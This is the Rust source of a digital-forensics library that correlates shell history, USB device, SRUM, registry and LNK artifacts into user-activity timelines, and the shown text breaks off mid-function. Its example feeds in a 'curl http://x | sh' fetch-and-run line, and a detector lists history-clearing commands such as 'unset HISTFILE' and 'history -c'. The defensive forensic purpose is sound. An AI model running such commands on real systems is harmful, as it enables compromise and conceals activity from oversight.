Skip to main content

useract_forensic/
lib.rs

1//! `useract-forensic` — the user-activity correlation layer.
2//!
3//! A thin **meta / orchestration** crate: it does not parse any raw format
4//! itself. It consumes already-decoded forensic reader types —
5//! [`shellhist_core::HistoryEntry`], [`peripheral_core::DeviceConnection`], SRUM
6//! records ([`srum_core`]), registry artifacts ([`winreg_artifacts`]), and Shell
7//! Link targets ([`lnk_core::ShellLink`]) — normalizes them into one uniform
8//! [`UserActivity`] event, builds a per-user timeline, and emits cross-source
9//! [`forensicnomicon::report::Finding`]s that no single source could produce alone.
10//!
11//! Every finding is an **observation** ("consistent with …"); the examiner draws
12//! the conclusions. MITRE techniques are narrated as consistency, never a verdict.
13//!
14//! ## 30-second example
15//!
16//! ```
17//! use useract_forensic::{build_timeline, audit, ShellHistorySource, DeviceSource};
18//! use shellhist_core::{HistoryEntry, Shell};
19//!
20//! // (sources are normally produced by the reader crates; constructed here inline)
21//! let entries = shellhist_core::parse_auto(b"#1700000000\ncurl http://x | sh\n", Some(".bash_history"));
22//! let shell = ShellHistorySource::new(&entries);
23//! let devices = DeviceSource::new(&[]);
24//!
25//! let timeline = build_timeline(&[&shell, &devices]);
26//! let findings = audit(&timeline);
27//! for f in &findings {
28//!     println!("{} — {}", f.code, f.note);
29//! }
30//! ```
31//!
32//! ## Sources
33//!
34//! Every source slots in behind the [`ActivitySource`] trait: shell history and
35//! peripheral devices (v0.1) plus SRUM (per-user app/network usage by SID — the
36//! first actor-attributing source), registry artifacts (UserAssist / TypedURLs /
37//! ShellBags), and recent-file LNK targets (carrying the volume serial that
38//! completes the device join). See `docs/roadmap.md` for the v0.3 sources.
39
40#![forbid(unsafe_code)]
41
42use forensicnomicon::report::{Category, ExternalRef, Finding, Severity, Source};
43use peripheral_core::{Bus, DeviceConnection};
44use shellhist_core::HistoryEntry;
45
/// The kind of thing a user did to a [`Subject`].
#[derive(Clone, Copy, Debug, Eq, Hash, PartialEq)]
pub enum Action {
    /// A program or command was run.
    Executed,
    /// A file or folder was opened or read.
    Accessed,
    /// A device was attached / connected.
    Connected,
    /// A search query was issued.
    Searched,
    /// Text was typed (e.g. a typed URL or a run-box entry).
    Typed,
    /// An activity record was disabled, cleared, or otherwise tampered with.
    HistoryTampered,
}
62
/// The object an [`Action`] was applied to.
#[derive(Clone, Debug, Eq, Hash, PartialEq)]
pub enum Subject {
    /// A shell command or program invocation.
    Command(String),
    /// A file, identified by path. When the source knows it (LNK `VolumeID`), the
    /// **volume serial** of the volume holding the file is carried too; it is the
    /// key that joins the file to a [`Subject::Device`] with the same serial (see
    /// [`device_file_volume_joins`]).
    File {
        /// Path of the file.
        path: String,
        /// NTFS/FAT serial of the volume the file lives on, if known.
        volume_serial: Option<u32>,
    },
    /// A folder, identified by path. When the source knows it (shellbag / LNK
    /// directory target), the **volume serial** of the holding volume is carried.
    Folder {
        /// Path of the folder.
        path: String,
        /// NTFS/FAT serial of the volume the folder lives on, if known.
        volume_serial: Option<u32>,
    },
    /// An external device. Its volume serial is stored separately from the id so
    /// that a [`Subject::File`] recorded with the same NTFS/FAT volume serial can
    /// be matched to it (see [`device_file_volume_joins`]).
    Device {
        /// Device instance id — the stable primary key.
        id: String,
        /// NTFS/FAT serial of the device's volume, if known.
        volume_serial: Option<u32>,
    },
    /// A search / lookup query.
    Query(String),
}

impl Subject {
    /// Build a [`Subject::File`] for `path` whose volume serial is unknown.
    #[must_use]
    pub fn file(path: impl Into<String>) -> Self {
        let path = path.into();
        Self::File {
            path,
            volume_serial: None,
        }
    }

    /// Build a [`Subject::Folder`] for `path` whose volume serial is unknown.
    #[must_use]
    pub fn folder(path: impl Into<String>) -> Self {
        let path = path.into();
        Self::Folder {
            path,
            volume_serial: None,
        }
    }
}
118
/// Identifies the reader crate an activity was normalized from.
///
/// The enum is `#[non_exhaustive]`, so new variants can be added without a
/// breaking change; downstream `match`es need a `_` arm.
#[non_exhaustive]
#[derive(Clone, Copy, Debug, Eq, Hash, PartialEq)]
pub enum SourceKind {
    /// Shell command history (`shellhist-core`).
    ShellHistory,
    /// External-device connections (`peripheral-core`).
    PeripheralDevice,
    /// Per-user app execution and network bytes attributed to a user SID
    /// (`srum-core` / `srum-parser`) — the first by-SID source.
    Srum,
    /// Per-user registry artifacts — UserAssist, TypedURLs, ShellBags
    /// (`winreg-artifacts`).
    Registry,
    /// Windows Shell Link (`.lnk`) targets (`lnk-core`), which carry the volume
    /// serial that completes the device join.
    LnkFile,
}
140
141/// One normalized user-activity event: *who* did *what*, *when*, to *which* subject.
142#[derive(Debug, Clone, PartialEq, Eq)]
143pub struct UserActivity {
144    /// Unix epoch seconds, when the source records it. `None` when the source
145    /// carries no usable timestamp (e.g. plain bash / PowerShell PSReadLine).
146    pub timestamp: Option<i64>,
147    /// The acting user / SID, when the source attributes it. Most v0.1 sources do
148    /// not attribute a user; SRUM (v0.2) is the first by-SID source.
149    pub actor: Option<String>,
150    /// What was done.
151    pub action: Action,
152    /// What it was done to.
153    pub subject: Subject,
154    /// Which reader produced this event.
155    pub source: SourceKind,
156    /// A human-readable detail string for the event.
157    pub detail: String,
158}
159
/// A producer of [`UserActivity`] events.
///
/// Implementing this trait is the v0.2 extension seam: a new reader wrapper
/// (`lnk-core`, `shellbag-core`, `srum-core`, `winreg-artifacts`) implements
/// `activities` and slots into [`build_timeline`] with no API change.
///
/// [`build_timeline`] takes sources as `&dyn ActivitySource`, so the trait must
/// stay object-safe.
pub trait ActivitySource {
    /// The activities this source contributes to the timeline.
    ///
    /// Returns an owned vector; [`build_timeline`] concatenates the vectors of all
    /// sources and then sorts the merged events by timestamp.
    fn activities(&self) -> Vec<UserActivity>;
}
169
/// Does this shell command disable or clear command history?
///
/// Recognizes the common anti-forensic primitives across bash/zsh/PowerShell. The
/// match is on structure (the verb + the well-known history target), not on a
/// hardcoded full command line, so any member of the class is caught.
///
/// Matching is ASCII-case-insensitive and ignores surrounding whitespace. The
/// recognized classes are:
///
/// - switching recording off (`unset HISTFILE`, `HISTFILE=/dev/null`,
///   `HISTSIZE=0`, `HISTFILESIZE=0`, `set +o history`);
/// - the `history` builtin invoked with a clearing short flag (`history -c`,
///   `history -cw`). The flag must follow the `history` word inside the same
///   simple command, so `history | grep -c ssh` and `gcc -c history.c` are *not*
///   reported;
/// - PowerShell `Clear-History`, or `Remove-Item` on the PSReadLine
///   `ConsoleHost_history` file;
/// - `rm` of `.bash_history` / `.zsh_history`;
/// - a truncating `>` redirect onto a history file (`> ~/.bash_history`,
///   `cat /dev/null > ~/.bash_history`); appending with `>>` is not tampering.
fn is_history_tamper(cmd: &str) -> bool {
    /// Substrings that turn history recording off in bash/zsh.
    const RECORDING_OFF: [&str; 5] = [
        "unset histfile",
        "histfile=/dev/null",
        "histsize=0",
        "histfilesize=0",
        "set +o history",
    ];

    /// Is the `history` builtin invoked with a clearing short flag?
    ///
    /// The line is split at `;`, `|`, `&` and newlines so a `-c` belonging to a
    /// different command in a pipeline or list is never attributed to `history`.
    fn clears_via_history_builtin(line: &str) -> bool {
        line.split(|ch: char| matches!(ch, ';' | '|' | '&' | '\n'))
            .any(|simple| {
                let mut words = simple.split_whitespace();
                // Tolerate alias-bypass (`\history`), subshell / command
                // substitution openers and an opening quote (`sh -c "history -c"`).
                let invoked = words.any(|w| {
                    w.trim_start_matches(|ch: char| {
                        matches!(ch, '\\' | '(' | '`' | '$' | '"' | '\'')
                    }) == "history"
                });
                // `words` now yields only what follows `history`.
                invoked
                    && words.any(|w| w.starts_with('-') && !w.starts_with("--") && w.contains('c'))
            })
    }

    /// Does any truncating `>` redirect target a `*_history` file?
    fn truncates_history_file(line: &str) -> bool {
        line.match_indices('>').any(|(at, _)| {
            let rest = &line[at + 1..];
            // Either half of `>>` is an append, which keeps the existing record.
            if line[..at].ends_with('>') || rest.starts_with('>') {
                return false;
            }
            rest.split_whitespace().next().map_or(false, |target| {
                target
                    .trim_matches(|ch: char| matches!(ch, '"' | '\'' | ';' | ')'))
                    .ends_with("_history")
            })
        })
    }

    let lowered = cmd.to_ascii_lowercase();
    let c = lowered.trim();

    // bash/zsh: unset the history file, point it at the bit bucket, or disable it.
    RECORDING_OFF.iter().any(|needle| c.contains(needle))
        // bash/zsh: clear the in-memory history list.
        || clears_via_history_builtin(c)
        // PowerShell: clear session history / remove the PSReadLine history file.
        || c.contains("clear-history")
        || (c.contains("remove-item") && c.contains("consolehost_history"))
        // Remove the history file directly.
        || (c.contains("rm ") && (c.contains(".bash_history") || c.contains(".zsh_history")))
        // Truncate the history file by redirection (leading or mid-command).
        || (c.starts_with("> ") && c.contains("history"))
        || truncates_history_file(c)
}
193
194/// A [`ShellHistorySource`] wraps a borrowed slice of decoded history entries.
195///
196/// Each command becomes an [`Action::Executed`] [`UserActivity`]; a command that
197/// disables or clears history becomes an [`Action::HistoryTampered`] event instead
198/// (the clearing itself is the activity worth surfacing).
199pub struct ShellHistorySource<'a> {
200    entries: &'a [HistoryEntry],
201    actor: Option<String>,
202}
203
204impl<'a> ShellHistorySource<'a> {
205    /// Wrap decoded history entries with no attributed actor.
206    #[must_use]
207    pub fn new(entries: &'a [HistoryEntry]) -> Self {
208        Self {
209            entries,
210            actor: None,
211        }
212    }
213
214    /// Wrap decoded history entries, attributing them to a known user/account.
215    #[must_use]
216    pub fn for_actor(entries: &'a [HistoryEntry], actor: impl Into<String>) -> Self {
217        Self {
218            entries,
219            actor: Some(actor.into()),
220        }
221    }
222}
223
224impl ActivitySource for ShellHistorySource<'_> {
225    fn activities(&self) -> Vec<UserActivity> {
226        from_shell_history(self.entries, self.actor.as_deref())
227    }
228}
229
230/// Normalize a decoded shell-history stream into [`UserActivity`] events.
231///
232/// Each command → [`Action::Executed`]; a history-clearing command →
233/// [`Action::HistoryTampered`]. The `actor` (when known) is carried onto every
234/// event.
235#[must_use]
236pub fn from_shell_history(entries: &[HistoryEntry], actor: Option<&str>) -> Vec<UserActivity> {
237    entries
238        .iter()
239        .map(|e| {
240            let action = if is_history_tamper(&e.command) {
241                Action::HistoryTampered
242            } else {
243                Action::Executed
244            };
245            UserActivity {
246                timestamp: e.timestamp,
247                actor: actor.map(ToString::to_string),
248                action,
249                subject: Subject::Command(e.command.clone()),
250                source: SourceKind::ShellHistory,
251                detail: e.command.clone(),
252            }
253        })
254        .collect()
255}
256
257/// A [`DeviceSource`] wraps a borrowed slice of decoded device connections.
258///
259/// Each connection becomes an [`Action::Connected`] [`UserActivity`] whose
260/// [`Subject::Device`] carries the device instance id and the **volume serial**, so
261/// the v0.2 LNK/shellbag join can light up.
262pub struct DeviceSource<'a> {
263    connections: &'a [DeviceConnection],
264}
265
266impl<'a> DeviceSource<'a> {
267    /// Wrap decoded device connections.
268    #[must_use]
269    pub fn new(connections: &'a [DeviceConnection]) -> Self {
270        Self { connections }
271    }
272}
273
274impl ActivitySource for DeviceSource<'_> {
275    fn activities(&self) -> Vec<UserActivity> {
276        from_device_connections(self.connections)
277    }
278}
279
280/// Normalize a decoded device-connection stream into [`UserActivity`] events.
281///
282/// Each connection → [`Action::Connected`], carrying the device id and the volume
283/// serial. The timestamp is the device's first-install/first-seen stamp when the
284/// source recorded one.
285#[must_use]
286pub fn from_device_connections(connections: &[DeviceConnection]) -> Vec<UserActivity> {
287    connections
288        .iter()
289        .map(|c| {
290            let timestamp = c
291                .first_install
292                .or(c.last_arrival)
293                .or(c.last_install)
294                .map(|s| s.value);
295            UserActivity {
296                timestamp,
297                actor: None,
298                action: Action::Connected,
299                subject: Subject::Device {
300                    id: c.device_instance_id.clone(),
301                    volume_serial: c.volume_serial,
302                },
303                source: SourceKind::PeripheralDevice,
304                detail: c.device_instance_id.clone(),
305            }
306        })
307        .collect()
308}
309
310/// A [`SrumSource`] wraps borrowed SRUM network-usage and app-usage records plus
311/// the `SruDbIdMapTable` that resolves their integer `user_id` / `app_id` foreign
312/// keys to user SIDs and application paths.
313///
314/// SRUM is the first source that **attributes** activity to a specific user: each
315/// row becomes an [`Action::Executed`] [`UserActivity`] whose `actor` is the
316/// resolved user SID. Network rows additionally carry the per-interval byte volume
317/// in `detail`, sharpening the exfiltration lens.
318pub struct SrumSource<'a> {
319    network: &'a [srum_core::NetworkUsageRecord],
320    app_usage: &'a [srum_core::AppUsageRecord],
321    id_map: &'a [srum_core::IdMapEntry],
322}
323
324impl<'a> SrumSource<'a> {
325    /// Wrap decoded SRUM records with the id-map needed to resolve users and apps.
326    #[must_use]
327    pub fn new(
328        network: &'a [srum_core::NetworkUsageRecord],
329        app_usage: &'a [srum_core::AppUsageRecord],
330        id_map: &'a [srum_core::IdMapEntry],
331    ) -> Self {
332        Self {
333            network,
334            app_usage,
335            id_map,
336        }
337    }
338}
339
340impl ActivitySource for SrumSource<'_> {
341    fn activities(&self) -> Vec<UserActivity> {
342        from_srum(self.network, self.app_usage, self.id_map)
343    }
344}
345
346/// Resolve a SRUM integer id to its mapped name via the `SruDbIdMapTable`.
347///
348/// Returns `None` when the id is absent from the map — the caller substitutes a
349/// stable synthetic token so the foreign key is never silently dropped.
350fn resolve_id(id: i32, id_map: &[srum_core::IdMapEntry]) -> Option<String> {
351    id_map
352        .iter()
353        .find(|e| e.id == id)
354        .map(|e| e.name.clone())
355        .filter(|n| !n.is_empty())
356}
357
358/// Normalize SRUM network-usage and app-usage records into [`UserActivity`] events.
359///
360/// Each record → [`Action::Executed`], attributed to the user SID resolved from the
361/// id-map (falling back to a `user-id:<n>` token when unresolved). The application
362/// resolves to its path (falling back to `app-id:<n>`). Network rows carry their
363/// `<bytes_sent>↑ / <bytes_recv>↓ bytes` in `detail`; app-usage rows carry their
364/// foreground/background CPU cycles. The `DateTime<Utc>` timestamp becomes Unix
365/// epoch seconds.
366#[must_use]
367pub fn from_srum(
368    network: &[srum_core::NetworkUsageRecord],
369    app_usage: &[srum_core::AppUsageRecord],
370    id_map: &[srum_core::IdMapEntry],
371) -> Vec<UserActivity> {
372    let mut acts = Vec::with_capacity(network.len() + app_usage.len());
373
374    for r in network {
375        let actor =
376            resolve_id(r.user_id, id_map).unwrap_or_else(|| format!("user-id:{}", r.user_id));
377        let app = resolve_id(r.app_id, id_map).unwrap_or_else(|| format!("app-id:{}", r.app_id));
378        acts.push(UserActivity {
379            timestamp: Some(r.timestamp.timestamp()),
380            actor: Some(actor),
381            action: Action::Executed,
382            subject: Subject::Command(app),
383            source: SourceKind::Srum,
384            detail: format!(
385                "{}\u{2191} / {}\u{2193} bytes (SRUM network usage)",
386                r.bytes_sent, r.bytes_recv
387            ),
388        });
389    }
390
391    for r in app_usage {
392        let actor =
393            resolve_id(r.user_id, id_map).unwrap_or_else(|| format!("user-id:{}", r.user_id));
394        let app = resolve_id(r.app_id, id_map).unwrap_or_else(|| format!("app-id:{}", r.app_id));
395        acts.push(UserActivity {
396            timestamp: Some(r.timestamp.timestamp()),
397            actor: Some(actor),
398            action: Action::Executed,
399            subject: Subject::Command(app),
400            source: SourceKind::Srum,
401            detail: format!(
402                "{} foreground / {} background CPU cycles (SRUM app usage)",
403                r.foreground_cycles, r.background_cycles
404            ),
405        });
406    }
407
408    acts
409}
410
411/// A [`LnkSource`] wraps borrowed Windows Shell Link targets parsed by `lnk-core`.
412///
413/// Each [`ShellLink`](lnk_core::ShellLink) → an [`Action::Accessed`]
414/// [`Subject::File`] whose path is the link's local base path (or the network
415/// target's UNC name) and whose `volume_serial` is the `VolumeID`
416/// `DriveSerialNumber` — the structured key that completes the device join. The
417/// target's last-write FILETIME becomes the activity timestamp.
418pub struct LnkSource<'a> {
419    links: &'a [lnk_core::ShellLink],
420    actor: Option<String>,
421}
422
423impl<'a> LnkSource<'a> {
424    /// Wrap parsed shell links, attributing them to a user when known.
425    #[must_use]
426    pub fn new(links: &'a [lnk_core::ShellLink], actor: Option<&str>) -> Self {
427        Self {
428            links,
429            actor: actor.map(ToString::to_string),
430        }
431    }
432}
433
434impl ActivitySource for LnkSource<'_> {
435    fn activities(&self) -> Vec<UserActivity> {
436        from_lnk(self.links, self.actor.as_deref())
437    }
438}
439
440/// Normalize parsed Shell Links into [`Action::Accessed`] file [`UserActivity`]s.
441///
442/// Each link's target path comes from `link_info.local_base_path`; when that is
443/// absent, the `CommonNetworkRelativeLink` net name (a UNC share) is used. A link
444/// with no `LinkInfo` and no resolvable target is skipped rather than emitting a
445/// pathless event. The target's `write_time` FILETIME (already Unix epoch seconds,
446/// 0 = unset) becomes the timestamp; the `VolumeID` drive serial is carried on the
447/// [`Subject::File`] as the device-join key.
448#[must_use]
449pub fn from_lnk(links: &[lnk_core::ShellLink], actor: Option<&str>) -> Vec<UserActivity> {
450    links
451        .iter()
452        .filter_map(|link| {
453            let info = link.link_info.as_ref()?;
454            let path = info.local_base_path.clone().or_else(|| {
455                info.common_network_relative_link
456                    .as_ref()
457                    .and_then(|c| c.net_name.clone())
458            })?;
459            let volume_serial = info.volume_id.as_ref().map(|v| v.drive_serial_number);
460            // lnk-core already maps a zero "not set" FILETIME to 0 epoch seconds.
461            let timestamp = (link.header.write_time != 0).then_some(link.header.write_time);
462            Some(UserActivity {
463                timestamp,
464                actor: actor.map(ToString::to_string),
465                action: Action::Accessed,
466                subject: Subject::File {
467                    path: path.clone(),
468                    volume_serial,
469                },
470                source: SourceKind::LnkFile,
471                detail: format!("LNK target: {path}"),
472            })
473        })
474        .collect()
475}
476
477/// Parse an ISO-8601 `%Y-%m-%dT%H:%M:%SZ` UTC timestamp (the form
478/// `winreg-artifacts` emits) into Unix epoch seconds. Returns [`None`] for an
479/// absent or unparseable value — a missing timestamp is forensically meaningful,
480/// not an error.
481fn iso8601_to_epoch(s: Option<&str>) -> Option<i64> {
482    let s = s?;
483    chrono::DateTime::parse_from_rfc3339(s)
484        .ok()
485        .map(|dt| dt.timestamp())
486}
487
488/// A [`RegistrySource`] wraps borrowed per-user registry artifacts decoded by
489/// `winreg-artifacts` from an `NTUSER.DAT` / `USRCLASS.DAT` hive.
490///
491/// It normalizes the three published per-user artifacts:
492/// [`UserAssist`](winreg_artifacts::userassist) → [`Action::Executed`],
493/// [`TypedURLs`](winreg_artifacts::typed_urls) → [`Action::Typed`], and
494/// [`ShellBags`](winreg_artifacts::shellbags) → [`Action::Accessed`] (folder).
495///
496/// `winreg-artifacts` v0.1 publishes exactly these three per-user decoders; it has
497/// no separate RecentDocs / RunMRU / MountPoints2 / TypedPaths modules, so the
498/// adapter maps the artifacts that actually exist.
499pub struct RegistrySource<'a> {
500    userassist: &'a [winreg_artifacts::userassist::UserAssistEntry],
501    typed_urls: &'a [winreg_artifacts::typed_urls::TypedUrl],
502    shellbags: &'a [winreg_artifacts::shellbags::ShellbagEntry],
503    actor: Option<String>,
504}
505
506impl<'a> RegistrySource<'a> {
507    /// Wrap decoded registry artifacts, attributing them to a user when known (the
508    /// hive owner — the SID/account the `NTUSER.DAT` belongs to).
509    #[must_use]
510    pub fn new(
511        userassist: &'a [winreg_artifacts::userassist::UserAssistEntry],
512        typed_urls: &'a [winreg_artifacts::typed_urls::TypedUrl],
513        shellbags: &'a [winreg_artifacts::shellbags::ShellbagEntry],
514        actor: Option<&str>,
515    ) -> Self {
516        Self {
517            userassist,
518            typed_urls,
519            shellbags,
520            actor: actor.map(ToString::to_string),
521        }
522    }
523}
524
525impl ActivitySource for RegistrySource<'_> {
526    fn activities(&self) -> Vec<UserActivity> {
527        from_registry(
528            self.userassist,
529            self.typed_urls,
530            self.shellbags,
531            self.actor.as_deref(),
532        )
533    }
534}
535
536/// Normalize UserAssist entries into [`Action::Executed`] [`UserActivity`] events.
537///
538/// Each entry → an `Executed` activity whose subject is the program path; the run
539/// count is carried in `detail` and the ROT13-decoded last-run timestamp parsed to
540/// epoch. The `actor` (the hive owner) is carried when known.
541#[must_use]
542pub fn from_userassist(
543    entries: &[winreg_artifacts::userassist::UserAssistEntry],
544    actor: Option<&str>,
545) -> Vec<UserActivity> {
546    entries
547        .iter()
548        .map(|e| UserActivity {
549            timestamp: iso8601_to_epoch(e.last_run.as_deref()),
550            actor: actor.map(ToString::to_string),
551            action: Action::Executed,
552            subject: Subject::Command(e.program.clone()),
553            source: SourceKind::Registry,
554            detail: format!("UserAssist: {} run {} time(s)", e.program, e.run_count),
555        })
556        .collect()
557}
558
559/// Normalize IE/Edge TypedURLs into [`Action::Typed`] [`UserActivity`] events.
560///
561/// Each typed URL → a `Typed` activity carrying the URL as a [`Subject::Query`]
562/// (an address-bar entry is a typed lookup); the companion `TypedURLsTime`
563/// timestamp parsed to epoch.
564#[must_use]
565pub fn from_typed_urls(
566    urls: &[winreg_artifacts::typed_urls::TypedUrl],
567    actor: Option<&str>,
568) -> Vec<UserActivity> {
569    urls.iter()
570        .map(|u| {
571            let detail = match &u.suspicious_reason {
572                Some(reason) => format!("TypedURL: {} ({reason})", u.url),
573                None => format!("TypedURL: {}", u.url),
574            };
575            UserActivity {
576                timestamp: iso8601_to_epoch(u.last_visited.as_deref()),
577                actor: actor.map(ToString::to_string),
578                action: Action::Typed,
579                subject: Subject::Query(u.url.clone()),
580                source: SourceKind::Registry,
581                detail,
582            }
583        })
584        .collect()
585}
586
587/// Normalize ShellBags into [`Action::Accessed`] folder [`UserActivity`] events.
588///
589/// Each BagMRU entry → an `Accessed` activity whose [`Subject::Folder`] is the
590/// reconstructed folder path; the key's `LastWriteTime` parsed to epoch.
591#[must_use]
592pub fn from_shellbags(
593    bags: &[winreg_artifacts::shellbags::ShellbagEntry],
594    actor: Option<&str>,
595) -> Vec<UserActivity> {
596    bags.iter()
597        .map(|b| UserActivity {
598            timestamp: iso8601_to_epoch(b.last_written.as_deref()),
599            actor: actor.map(ToString::to_string),
600            action: Action::Accessed,
601            subject: Subject::folder(b.path.clone()),
602            source: SourceKind::Registry,
603            detail: format!("ShellBag {}: {}", b.key_path, b.path),
604        })
605        .collect()
606}
607
608/// Normalize all three per-user registry artifacts into one [`UserActivity`] stream.
609///
610/// Concatenates [`from_userassist`], [`from_typed_urls`], and [`from_shellbags`],
611/// attributing every event to the hive owner when known.
612#[must_use]
613pub fn from_registry(
614    userassist: &[winreg_artifacts::userassist::UserAssistEntry],
615    typed_urls: &[winreg_artifacts::typed_urls::TypedUrl],
616    shellbags: &[winreg_artifacts::shellbags::ShellbagEntry],
617    actor: Option<&str>,
618) -> Vec<UserActivity> {
619    let mut acts = from_userassist(userassist, actor);
620    acts.extend(from_typed_urls(typed_urls, actor));
621    acts.extend(from_shellbags(shellbags, actor));
622    acts
623}
624
625/// Merge any number of [`ActivitySource`]s into one timeline, sorted by timestamp.
626///
627/// Events with a timestamp come first in ascending epoch order; `None`-timestamp
628/// events are kept (their order is forensically meaningful too) and ordered stably
629/// at the end, preserving source/insertion order among themselves.
630#[must_use]
631pub fn build_timeline(sources: &[&dyn ActivitySource]) -> Vec<UserActivity> {
632    let mut events: Vec<UserActivity> = sources.iter().flat_map(|s| s.activities()).collect();
633    // Stable sort keeps None-timestamp events in source order; the key puts
634    // timestamped events first (ascending), untimestamped last.
635    events.sort_by_key(|e| (e.timestamp.is_none(), e.timestamp.unwrap_or(i64::MAX)));
636    events
637}
638
/// Default width, in seconds, of the temporal window used by the
/// exec-during-removable-media join.
///
/// One hour: wide enough to catch a command run while a stick is mounted, yet
/// tight enough that the temporal coincidence stays meaningful and the
/// false-positive rate stays low.
pub const REMOVABLE_MEDIA_WINDOW_SECS: i64 = 60 * 60;
645
/// Conservative per-interval `bytes_sent` threshold at or above which a SRUM
/// network row is surfaced as a graded exfiltration **lead**
/// (`USERACT-NETWORK-EXFIL-VOLUME`).
///
/// SRUM aggregates per process per ~1-hour interval. 256 MiB sent by one process
/// in one interval is well above routine background/telemetry traffic, yet low
/// enough to catch a deliberate bulk upload. It is a deliberately conservative
/// lead, not a verdict — a backup client or a large legitimate upload can cross it
/// too, so the examiner adjudicates.
pub const NETWORK_EXFIL_BYTES_THRESHOLD: u64 = 256 << 20;
655
656/// The [`Source`] stamp for findings this analyzer emits.
657#[must_use]
658pub fn source(scope: impl Into<String>) -> Source {
659    Source {
660        analyzer: "useract-forensic".to_string(),
661        scope: scope.into(),
662        version: Some(env!("CARGO_PKG_VERSION").to_string()),
663    }
664}
665
666/// Generic volume-serial join: pair every [`Subject::Device`] activity with every
667/// [`Subject::File`] / [`Subject::Folder`] activity that names the **same volume
668/// serial**.
669///
670/// Active in v0.2: a [`Subject::File`] / [`Subject::Folder`] carrying a
671/// `volume_serial` (from `lnk-core`'s `VolumeID`) joins to a [`Subject::Device`]
672/// connected with the same serial. Returns `(device_index, file_index)` pairs into
673/// `events`.
674///
675/// The volume serial is read first from the subject's structured `volume_serial`
676/// field; a `vol:<serial>` token in [`UserActivity::detail`] is honored as a
677/// fallback so an out-of-band source that only annotates the detail still joins.
678#[must_use]
679pub fn device_file_volume_joins(events: &[UserActivity]) -> Vec<(usize, usize)> {
680    let mut pairs = Vec::new();
681    for (di, dev) in events.iter().enumerate() {
682        let Subject::Device {
683            volume_serial: Some(dev_serial),
684            ..
685        } = &dev.subject
686        else {
687            continue;
688        };
689        for (fi, file) in events.iter().enumerate() {
690            if file_volume_serial(file) == Some(*dev_serial) {
691                pairs.push((di, fi));
692            }
693        }
694    }
695    pairs
696}
697
698/// Extract a file/folder activity's volume serial: the subject's structured
699/// `volume_serial` field, else a `vol:<serial>` token in its
700/// [`UserActivity::detail`]. Non-file subjects yield [`None`].
701fn file_volume_serial(activity: &UserActivity) -> Option<u32> {
702    let structured = match &activity.subject {
703        Subject::File { volume_serial, .. } | Subject::Folder { volume_serial, .. } => {
704            *volume_serial
705        }
706        _ => return None,
707    };
708    if structured.is_some() {
709        return structured;
710    }
711    for tok in activity.detail.split_whitespace() {
712        if let Some(rest) = tok.strip_prefix("vol:") {
713            if let Ok(serial) = rest.parse::<u32>() {
714                return Some(serial);
715            }
716        }
717    }
718    None
719}
720
721/// Audit a merged timeline for cross-source user-activity findings.
722///
723/// Emits hedged, low-false-positive observations achievable from the v0.1 sources:
724///
725/// - `USERACT-EXEC-DURING-REMOVABLE-MEDIA` — a shell command executed within
726///   [`REMOVABLE_MEDIA_WINDOW_SECS`] of a removable mass-storage device connection
727///   (temporal cross-source join). Consistent with activity involving external
728///   media (MITRE T1052 / T1091).
729/// - `USERACT-HISTORY-TAMPERED` — a history-clearing activity present in the
730///   timeline (re-surfaced at the user-activity layer; MITRE T1070.003).
731///
732/// Every finding is an observation, never a verdict.
733#[must_use]
734pub fn audit(events: &[UserActivity]) -> Vec<Finding> {
735    audit_with(events, &source("host"))
736}
737
738/// [`audit`] with a caller-supplied [`Source`] stamp (scope/version).
739#[must_use]
740pub fn audit_with(events: &[UserActivity], src: &Source) -> Vec<Finding> {
741    let mut findings = Vec::new();
742
743    // Removable mass-storage connection windows: (epoch, device id).
744    //
745    // Eligibility is derived structurally from the device instance id's leading
746    // enumerator token (`USBSTOR`, `USB`, `SD`, `SCSI`, …) via the published
747    // `peripheral_core::Bus` classifier — not a hardcoded device list — so any
748    // mass-storage member of the class qualifies and HID/Bluetooth/MTP devices do
749    // not.
750    let media_windows: Vec<(i64, &str)> = events
751        .iter()
752        .filter_map(|e| match (&e.action, &e.subject, e.timestamp) {
753            (Action::Connected, Subject::Device { id, .. }, Some(ts)) if is_mass_storage_id(id) => {
754                Some((ts, id.as_str()))
755            }
756            _ => None,
757        })
758        .collect();
759
760    // USERACT-FILE-ON-EXTERNAL-DEVICE — a file/folder accessed on a volume whose
761    // serial matches a connected external device (the volume-serial join).
762    for (di, fi) in device_file_volume_joins(events) {
763        findings.push(file_on_external_device_finding(
764            &events[di],
765            &events[fi],
766            src,
767        ));
768    }
769
770    for event in events {
771        // USERACT-HISTORY-TAMPERED — re-surface the clearing signal here.
772        if event.action == Action::HistoryTampered {
773            findings.push(history_tampered_finding(event, src));
774            continue;
775        }
776
777        // USERACT-NETWORK-EXFIL-VOLUME — a SRUM network row whose per-interval
778        // bytes_sent crosses the conservative threshold (graded lead, not a verdict).
779        if event.source == SourceKind::Srum {
780            if let Some(bytes_sent) = srum_network_bytes_sent(event) {
781                if bytes_sent >= NETWORK_EXFIL_BYTES_THRESHOLD {
782                    findings.push(network_exfil_volume_finding(event, bytes_sent, src));
783                }
784            }
785        }
786
787        // USERACT-EXEC-DURING-REMOVABLE-MEDIA — temporal cross-source join.
788        if let (Action::Executed, Some(ts), Subject::Command(cmd)) =
789            (event.action, event.timestamp, &event.subject)
790        {
791            if let Some((win_ts, dev_id)) = media_windows
792                .iter()
793                .find(|(dev_ts, _)| (ts - dev_ts).abs() <= REMOVABLE_MEDIA_WINDOW_SECS)
794            {
795                findings.push(exec_during_media_finding(cmd, ts, *win_ts, dev_id, src));
796            }
797        }
798    }
799
800    findings
801}
802
803/// Is this device instance id a removable mass-storage transport?
804///
805/// Classifies the leading enumerator token (the part before the first `\`) with the
806/// published [`peripheral_core::Bus`] classifier. A bare id with no separator is
807/// treated as its own enumerator. Structural, not a device allow-list.
808fn is_mass_storage_id(instance_id: &str) -> bool {
809    let enumerator = instance_id.split('\\').next().unwrap_or(instance_id);
810    Bus::from_enumerator(enumerator).is_mass_storage()
811}
812
813fn history_tampered_finding(event: &UserActivity, src: &Source) -> Finding {
814    let cmd = match &event.subject {
815        Subject::Command(c) => c.as_str(),
816        _ => event.detail.as_str(),
817    };
818    Finding::observation(
819        Severity::Medium,
820        Category::Concealment,
821        "USERACT-HISTORY-TAMPERED",
822    )
823    .source(src.clone())
824    .note(format!(
825        "user activity {cmd:?} disables or clears the activity record; consistent with \
826             anti-forensic history tampering (MITRE T1070.003)"
827    ))
828    .evidence("command", cmd.to_string())
829    .external_ref(ExternalRef::mitre_attack("T1070.003"))
830    .build()
831}
832
833fn exec_during_media_finding(
834    cmd: &str,
835    cmd_ts: i64,
836    dev_ts: i64,
